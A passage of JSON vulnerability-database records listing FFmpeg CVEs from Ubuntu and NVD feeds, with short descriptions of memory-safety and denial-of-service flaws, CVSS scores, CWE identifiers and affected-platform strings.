"cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12730"], "modified": "2019-06-04T00:00:00", "id": "UB:CVE-2019-12730", "href": "https://ubuntu.com/security/CVE-2019-12730", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T21:29:24", "description": "FFmpeg before 4.2 has a heap-based buffer overflow in vqa_decode_chunk\nbecause of an out-of-array access in vqa_decode_init in\nlibavcodec/vqavideo.c.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-14T00:00:00", "type": "ubuntucve", "title": "CVE-2019-17542", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17542"], "modified": "2019-10-14T00:00:00", "id": "UB:CVE-2019-17542", "href": "https://ubuntu.com/security/CVE-2019-17542", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T21:29:24", "description": "In FFmpeg before 4.2, avcodec_open2 in libavcodec/utils.c allows a NULL\npointer dereference and possibly unspecified other impact when there is no\nvalid close function pointer.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[ebarretto](<https://launchpad.net/~ebarretto>) | This issue was caused by b1febda0619 The above commit was never integrated to 2.8.x but for 3.4, it was both integrated and fixed in 3.4.7, so letting bionic version marked as needed.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-14T00:00:00", "type": "ubuntucve", "title": "CVE-2019-17539", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17539"], "modified": "2019-10-14T00:00:00", "id": "UB:CVE-2019-17539", "href": "https://ubuntu.com/security/CVE-2019-17539", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T21:37:08", "description": "The decode_init function in libavcodec/utvideodec.c in FFmpeg 2.8 through\n3.4.2 allows remote attackers to cause a denial of service (Out of array\nread) via an AVI file with crafted dimensions within chroma subsampling\ndata.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-02-28T00:00:00", "type": "ubuntucve", "title": "CVE-2018-7557", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7557"], "modified": "2018-02-28T00:00:00", "id": "UB:CVE-2018-7557", "href": "https://ubuntu.com/security/CVE-2018-7557", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-11-22T21:37:20", "description": "The decode_plane function in libavcodec/utvideodec.c in FFmpeg through\n3.4.2 allows remote attackers to cause a denial of service (out of array\nread) via a crafted AVI file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-02-12T00:00:00", "type": "ubuntucve", "title": "CVE-2018-6912", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-6912"], "modified": "2018-02-12T00:00:00", "id": "UB:CVE-2018-6912", "href": "https://ubuntu.com/security/CVE-2018-6912", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-11-22T21:36:35", "description": "The decode_init function in libavcodec/utvideodec.c in FFmpeg through 3.4.2\nallows remote attackers to cause a denial of service (out of array read)\nvia an AVI file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-04-11T00:00:00", "type": "ubuntucve", "title": "CVE-2018-10001", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10001"], "modified": "2018-04-11T00:00:00", "id": "UB:CVE-2018-10001", "href": "https://ubuntu.com/security/CVE-2018-10001", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-01-21T20:40:49", "description": "The svg_probe function in libavformat/img2dec.c in FFmpeg through 3.4.2\nallows remote attackers to cause a denial of service (Infinite Loop) via a\ncrafted XML file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-04-24T00:00:00", "type": "ubuntucve", "title": "CVE-2018-7751", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7751"], "modified": "2018-04-24T00:00:00", "id": "UB:CVE-2018-7751", "href": "https://ubuntu.com/security/CVE-2018-7751", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-11-22T21:36:35", "description": "The export function in libavfilter/vf_signature.c in FFmpeg through 3.4.2\nallows remote attackers to cause a denial of service (out-of-array access)\nor possibly have unspecified other impact via a long filename.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-07T00:00:00", "type": "ubuntucve", "title": "CVE-2018-9841", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-9841"], "modified": "2018-04-07T00:00:00", "id": "UB:CVE-2018-9841", "href": "https://ubuntu.com/security/CVE-2018-9841", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T20:14:56", "description": "In FFmpeg 4.1.3, there is a division by zero at adx_write_trailer in libavformat/rawenc.c.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2019-07-07T22:15:00", "type": "cve", "title": "CVE-2019-13390", "cwe": ["CWE-369"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13390"], "modified": "2020-07-27T19:15:00", "cpe": ["cpe:/a:ffmpeg:ffmpeg:4.1.3"], "id": "CVE-2019-13390", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13390", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ffmpeg:ffmpeg:4.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T20:12:47", "description": "block_cmp() in libavcodec/zmbvenc.c in FFmpeg 4.1.3 has a heap-based buffer over-read.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-07-05T01:15:00", "type": "cve", "title": "CVE-2019-13312", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13312"], "modified": "2020-07-28T22:15:00", "cpe": ["cpe:/a:ffmpeg:ffmpeg:4.1.3"], "id": "CVE-2019-13312", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13312", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ffmpeg:ffmpeg:4.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T19:57:01", "description": "aa_read_header in libavformat/aadec.c in FFmpeg before 3.2.14 and 4.x before 4.1.4 does not check for sscanf failure and consequently allows use of uninitialized variables.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-04T14:29:00", "type": "cve", "title": "CVE-2019-12730", "cwe": ["CWE-908"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12730"], "modified": "2020-08-24T17:37:00", "cpe": [], "id": "CVE-2019-12730", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12730", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T21:37:25", "description": "FFmpeg before 4.2 has a heap-based buffer overflow in vqa_decode_chunk because of an out-of-array access in vqa_decode_init in libavcodec/vqavideo.c.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-14T02:15:00", "type": "cve", "title": "CVE-2019-17542", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17542"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:canonical:ubuntu_linux:20.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2019-17542", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-17542", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2022-03-23T21:37:18", "description": "In FFmpeg before 4.2, avcodec_open2 in libavcodec/utils.c allows a NULL pointer dereference and possibly unspecified other impact when there is no valid close function pointer.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-14T02:15:00", "type": "cve", "title": "CVE-2019-17539", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17539"], "modified": "2021-06-10T13:58:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:canonical:ubuntu_linux:20.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2019-17539", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-17539", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:38:20", "description": "The decode_init function in libavcodec/utvideodec.c in FFmpeg 2.8 through 3.4.2 allows remote attackers to cause a denial of service (Out of array read) via an AVI file with crafted dimensions within chroma subsampling data.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-02-28T07:29:00", "type": "cve", "title": "CVE-2018-7557", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7557"], "modified": "2021-01-04T23:15:00", "cpe": ["cpe:/a:ffmpeg:ffmpeg:3.4.2", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:debian:debian_linux:8.0"], "id": "CVE-2018-7557", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7557", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ffmpeg:ffmpeg:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:31:53", "description": "The decode_plane function in libavcodec/utvideodec.c in FFmpeg through 3.4.2 allows remote attackers to cause a denial of service (out of array read) via a crafted AVI file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-02-12T02:29:00", "type": "cve", "title": "CVE-2018-6912", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-6912"], "modified": "2020-03-30T17:15:00", "cpe": ["cpe:/a:ffmpeg:ffmpeg:3.4.2"], "id": "CVE-2018-6912", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6912", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ffmpeg:ffmpeg:3.4.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:48:18", "description": "The decode_init function in libavcodec/utvideodec.c in FFmpeg through 3.4.2 allows remote attackers to cause a denial of service (out of array read) via an AVI file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-04-11T03:29:00", "type": "cve", "title": "CVE-2018-10001", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10001"], "modified": "2020-03-30T17:15:00", "cpe": ["cpe:/a:ffmpeg:ffmpeg:3.4.2", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-10001", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10001", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ffmpeg:ffmpeg:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:39:38", "description": "The svg_probe function in libavformat/img2dec.c in FFmpeg through 3.4.2 allows remote attackers to cause a denial of service (Infinite Loop) via a crafted XML file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-04-24T06:29:00", "type": "cve", "title": "CVE-2018-7751", "cwe": ["CWE-835"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7751"], "modified": "2020-03-30T17:15:00", "cpe": ["cpe:/a:ffmpeg:ffmpeg:3.4.2"], "id": "CVE-2018-7751", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7751", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ffmpeg:ffmpeg:3.4.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:54:06", "description": "The export function in libavfilter/vf_signature.c in FFmpeg through 3.4.2 allows remote attackers to cause a denial of service (out-of-array access) or possibly have unspecified other impact via a long filename.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-07T07:29:00", "type": "cve", "title": 